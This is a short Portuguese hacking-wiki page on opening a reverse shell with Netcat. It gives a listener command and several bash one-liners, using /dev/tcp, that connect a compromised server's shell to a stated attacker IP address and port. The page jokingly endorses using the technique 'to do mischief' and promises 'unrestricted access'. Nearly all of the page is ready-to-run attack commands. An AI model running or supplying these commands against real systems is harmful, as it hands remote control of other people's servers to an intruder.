Shell reversa utilizando Netcat

De Wiki Hackstore

Explicação

Tal técnica é utilizada quando há algum problema de autenticação com o PAM, ou SSH, e é necessário acessar um servidor remoto. Ou no caso de uns e outros, tal técnica é usada pra fazer merda mesmo. :D


Prática

Assumindo que o endereço do atacante ip 187.115.43.231 (ip real) e a porta de escuta é 8181, abra um socket com a porta escolhida:

Invasor

$ nc -l 8181 -v

Invadido

Digite no terminal (servidor atacado) o alvo da máquina a ser estabelecida a conexão tcp:

/bin/bash -i > /dev/tcp/187.115.43.231/8181 0<&1 2>&1

ou

exec 5<>/dev/tcp/187.115.43.231/8181

ou

cat <&5 | while read line; do $line 2>&5 >&5; done


Pronto! Você agora está diretamente na shell remota. Basta digitar qualquer comando para ter acesso irrestrito, com o stdout todo encaminhado para sua tela. ;)

Mais dicas:

https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/